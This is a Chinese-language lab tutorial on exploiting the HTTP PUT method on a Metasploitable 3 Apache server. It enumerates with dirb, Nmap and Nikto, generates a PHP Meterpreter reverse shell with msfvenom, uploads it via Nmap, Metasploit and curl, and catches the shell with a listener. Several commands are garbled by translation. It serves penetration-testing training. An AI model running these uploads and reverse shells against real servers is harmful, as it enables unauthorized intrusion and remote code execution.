Metasploitable 3:利用HTTP PUT


在这个教程中,我们将利用Metasploitable 3的一个Web服务器上的HTTP PUT方法将文件上传到Web服务器。如果Web服务器上启用了HTTP PUT方法,则可以使用该方法将指定资源上载到目标服务器(如Web Shell),然后执行该方法。在本教程中,我们将了解如何确定HTTP PUT方法是否已启用,并且我们将使用几种不同的方法来上传Meterpreter反向shell。

对于本教程,我们假设您已安装了Metasploitable 3。如果您尚未安装Metasploitable 3,请按照如何安装如何安装Metasploitable 3教程进行安装

确定允许的HTTP方法

首先,我们将学习如何确定允许哪些HTTP方法,并确定HTTP PUT是否是其中之一。从Nmap端口扫描中,我们发现Metasploitable在端口80上运行Microsoft IIS,在端口8585上运行Apache httpd 2.2.21。在本教程中,我们将在端口8585上定位Apache服务器。

在Metasploitable 3上进行Nmap服务扫描

用Dirb发现Web服务器目录

下一步是找出这个网络服务器上有什么目录。暴力破解网络服务器上的目录的好工具是dirb。当我们使用以下命令在Apache网络服务器上运行dirb时,我们找到一个名为'uploads'的目录:

dirb http://172.28.128.3:8585

Dirb在Metasploitable 3端口8585上找到上传目录。

Nmap:确定允许的HTTP方法

我们可以使用几种方法来确定我们是否允许使用HTTP PUT方法将文件上传到此目录。可以使用提供允许方法列表的OPTIONS HTTP方法来测试允许的HTTP方法。但是,因为这可能并不总是有效,所以更简单的方法是在上传目录上运行Nmap http-methods脚本。当我们运行以下命令时,请参阅为上传目录启用HTTP PUT:

nmap -script http-methods -script-args http-methods.url-path ='/ uploads',http-methods.test-all -p 8585 172.28.128.3

Nmap HTTP-Methods脚本返回上传目录的允许方法。

正如我们所看到的,网络服务器允许我们将文件上传到上传目录,甚至删除文件。


我们还可以使用网络漏洞扫描程序Nikto来确定Web服务器中的漏洞。如果启用HTTP PUT方法,Nikto会将其指示如下:

nikto -host http://172.28.128.3:8585/uploads

12-Nikto HTTP PUT

Nikto输出的最后一行表示上传目录允许使用HTTP PUT上传文件。

利用shell的HTTP PUT

现在我们知道我们可以将文件上传到这个目录中,让我们看看几种不同的方法来做到这一点。在本教程的下一步中,我们将上传一个Meterpreter PHP反向shell脚本到网络服务器并执行它。我们将演示如何使用Nmap,Metasploit和Curl上传文件。

Nmap HTTP PUT Meterpreter外壳

让我们通过运行以下命令首先创建一个带有msfvenom的PHP Meterpreter反向shell有效负载:

msfvenom -p php / meterpreter / reverse_tcp lhost = [Listening host IP] lport = 4444 -f raw> /root/meterpreter.php

用Msfvenom创建PHP Meterpreter反向shell有效载荷。

修改文件以确保脚本包含正确的PHP打开和关闭标记:

在文件的开头添加PHP开始标记:

接下来,我们将在Metasploit中设置侦听器,以使用以下命令拦截反向shell:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

//确保在这里设置有效载荷,否则您可能会收到错误

set lhost [Listening host IP]


set lport 4444


run

在Metasploit中设置多处理器漏洞利用。

Nmap HTTP-PUT脚本

现在我们已经创建了Meterpreter负载并在Metasploit中设置了我们的监听器,我们将使用Nmap将Meterpreter负载上传到网络服务器。执行以下命令来运行  Nmap http-put脚本

nmap -sV -script http-put -script-args http-put.url ='/ uploads / meterpreter.php',http-put.file ='/ root / Desktop / meterpreter.php'-p 8585 [目标IP]

在端口8585上使用Nmap http-put脚本。

正如我们在截图中看到的,meterpreter.php已成功创建。由于端口8585未在nmap服务文件中定义为http服务端口,因此使用-sV标志运行服务扫描非常重要。否则,脚本将无法上传文件,只会显示开放端口和未知服务。

Metasploit HTTP PUT辅助模块

我们也可以使用Metasploit辅助模块HTTP PUT将文件上传到uploads web目录。在下面的步骤中,我们将上传我们之前在本教程中创建的PHP Meterpreter反向shell脚本,并用多处理程序模块拦截Meterpreter反向shell。运行以下命令:

msfconsole


use auxiliary/scanner/http/http_put


set rhosts [rhost]


set rport 8585


set path /uploads


set filename meterpreter.php


set filedata file://root/Desktop/meterpreter.php


Metasploit HTTP-PUT选项。

下一步是再次设置多处理器模块以拦截反向shell连接并使用run命令执行辅助模块:

Metasploit表示上传失败。

Metasploit向我们显示上传失败,但是当我们检查web服务器上的上传目录时,我们可以看到文件上传确实经历了:

但上传确实通过了。

剩下的就是执行PHP脚本并从我们的多处理程序接收来自Metasploitable 3机器的反向shell:

在web服务器上执行meterpreter.php脚本,并在多处理器上获得一个反向shell。

使用Curl的HTTP PUT

最后,我们还可以使用Curl通过单个命令上传Meterpreter负载:

curl -i -X PUT -H“Content-Type:text / plain; charset = utf-8“-d”/root/Desktop/meterpreter.php“http://172.28.128.3:8585/uploads/meterpreter.php

或者,您也可以使用Curl使用HTTP-PUT上传meterpreter.php文件。

正如我们所看到的,meterpreter.php文件已成功上传到网络服务器。

总结

在本教程中,我们学习了如何评估使用HTTP PUT方法上传文件的网络服务器。我们发现Metasploitable 3机器上端口8585上的uploads目录允许我们上传恶意文件并在web服务器上下文中执行它们。我们使用了3种不同的工具来上传文件;Nmap,Metasploit和Curl

发表评论 / Comment

用心评论~